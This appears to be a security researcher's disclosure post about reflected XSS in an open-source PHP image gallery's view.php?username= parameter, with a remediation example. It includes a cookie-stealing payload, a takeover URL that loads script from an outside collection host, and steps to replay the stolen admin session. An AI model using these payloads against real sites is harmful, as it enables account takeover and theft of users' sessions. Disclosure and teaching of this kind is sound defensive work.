Hi All,
I am Maloy Roy Orko.
Recently, during one of my pentest research sessions, I came across Image_Gallery by Needyamin, an open-source image gallery management system written in PHP, MySQL and JavaScript.
Curious to explore its functionality, I downloaded it and set it up on my local system.
After going through the source code, I found that it has no Cross-Site Scripting protection at all: user input is echoed back into the page without any output encoding.
This lets an attacker run malicious JavaScript in a victim's browser and, as shown below, take over the admin account.
The main point is that anyone who deploys this template without an IT background inherits this vulnerability, and the reputation of their company can suffer with it. That is why I am trying to inform everyone about it.
- Title of the Vulnerability: Image_Gallery | view.php?username= | Cross Site Scripting (Reflected XSS) | Found By Maloy Roy Orko
- Vulnerability Class: Reflected Cross Site Scripting
- Product Name: Image_Gallery
- Vendor: https://github.com/needyamin/
- Vulnerable Product Link: https://github.com/needyamin/image_gallery/
- Technical Details & Description: view.php reflects the username query parameter into the HTML response without any output encoding, which allows reflected Cross-Site Scripting. An attacker can execute arbitrary JavaScript in the victim's browser and, by stealing the session cookie of a logged-in administrator, take over the admin account.
- Product & Service Introduction: Image_Gallery
Observation & Exploitation:
- Let's look at the source code, file view.php:
- You can see that there is no defense or filter against Cross-Site Scripting. The script takes the gallery name from the request and looks it up in the database, but even when no such gallery exists it still prints the supplied name into the output unencoded, which leads to XSS.
- So, how did I exploit it? Which parameter is exploitable here?
- view.php?username=
- Let's take that parameter and see how to exploit it. The most important decision is what you want to achieve with the exploit.
- If you want to take over the admin account, follow along.
- Vulnerable place:
- 192.168.0.101:8080/ima/view.php?username=Your+Exploit
- My exploit is: <script>alert(document.cookie);</script>
- So, let's see the approach and the result.
- My exploit for cookie enumeration was:
- http://192.168.0.101:8080/ima/view.php?username=%3Cscript%3Ealert(document.cookie);%3C/script%3E
- Maybe 😏 you are thinking that the cookie is protected by the HttpOnly flag and we can't get to it? 😁
- Not here: the alert above shows the session cookie in document.cookie, which means the application does not set the flag (PHP does not add HttpOnly unless session.cookie_httponly is enabled). If the flag were set, document.cookie would not expose the cookie, and an attacker would have to drive the admin's session from inside the injected script instead of stealing the cookie outright.
- I will show it via XSS Report now.
- But first, let's see the practical impact, 😜 huh?
Practical Impact 😉:
- We trap the admin into visiting our crafted URL. When he opens it, the injected script sends us his cookie 🍪
- The exploit (admin takeover) will be:
- http://192.168.0.101:8080/ima/view.php?username=%3Cscript%20src=https://xss.report/c/ovroking%3E%3C/script%3E
- Now we have everything we need to log in. Even the admin panel path is a known one: it is /admin/.
- So use your cookie editor, set the stolen session cookie, and get in.
- Let's log in .......! 😁
- Login successful.
- Guess what? 😎😎 We logged in successfully. From here we can also chain malicious JavaScript hooking payloads 🤝
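As an added example (not the project's own code, and reconstructed from the behaviour described above rather than copied from view.php), here is the vulnerable echo pattern next to a hardened version, plus the session cookie flags that would have stopped the cookie-theft step. The gallery table, the function names and the session settings are assumptions for illustration:

```php
<?php
// Added example (editor's reconstruction, not code from the Image_Gallery
// project). Shows the view.php?username= echo pattern described in the
// write-up beside a hardened version. Function names, the gallery table and
// the session settings are assumptions for illustration.
declare(strict_types=1);

// Stand-in for the database lookup: a fixed gallery table (constructed data).
const GALLERIES = ['alice' => ['title' => "Alice's photos", 'count' => 12]];

function find_gallery(string $username): ?array
{
    return GALLERIES[$username] ?? null;
}

// VULNERABLE: the raw query value is written into the HTML whether or not
// the gallery exists, so <script>alert(document.cookie);</script> runs.
function render_vulnerable(string $username): string
{
    $g = find_gallery($username);
    if ($g === null) {
        return "<h2>No gallery found for {$username}</h2>";
    }
    return "<h2>{$g['title']} ({$username}, {$g['count']} images)</h2>";
}

// HARDENED: encode every untrusted value for the HTML text context.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_hardened(string $username): string
{
    $g = find_gallery($username);
    $name = h($username);
    if ($g === null) {
        return "<h2>No gallery found for {$name}</h2>";
    }
    return "<h2>" . h($g['title']) . " ({$name}, " . (int) $g['count'] . " images)</h2>";
}

// What view.php effectively does with the request (assumed shape):
// read ?username= and hand it to the renderer.
function handle_request(array $get, bool $hardened): string
{
    $username = (string) ($get['username'] ?? '');
    return $hardened ? render_hardened($username) : render_vulnerable($username);
}

// Session cookie flags. PHP leaves HttpOnly off unless session.cookie_httponly
// is enabled; with these flags set, document.cookie no longer exposes the
// session id, which is what the cookie-theft step above relies on.
function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // only sent over HTTPS
        'httponly' => true,   // not readable from JavaScript
        'samesite' => 'Lax',
    ]);
    session_start();
}

if (PHP_SAPI !== 'cli') {
    start_hardened_session();
}

// Demo with the payload from the write-up, as PHP receives it in $_GET
// after URL decoding.
$payload = '<script>alert(document.cookie);</script>';
echo "vulnerable: ", handle_request(['username' => $payload], false), "\n";
echo "hardened:   ", handle_request(['username' => $payload], true), "\n";
```

Run it with `php view_example.php`: the vulnerable line carries the script tag through untouched, the hardened line has it turned into `&lt;script&gt;...`, so the browser renders text instead of executing it. Output encoding is the fix for the XSS itself; the cookie flags only limit what a successful injection can steal.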
Video POC for SQL INJECTION to XSS :-
Conclusion :-
The main aim of this article is to show that anyone who deploys this template without an IT background inherits this vulnerability, and the reputation of their company can suffer with it. I also hope it gives you ideas of how combining attacks can make them much more potent.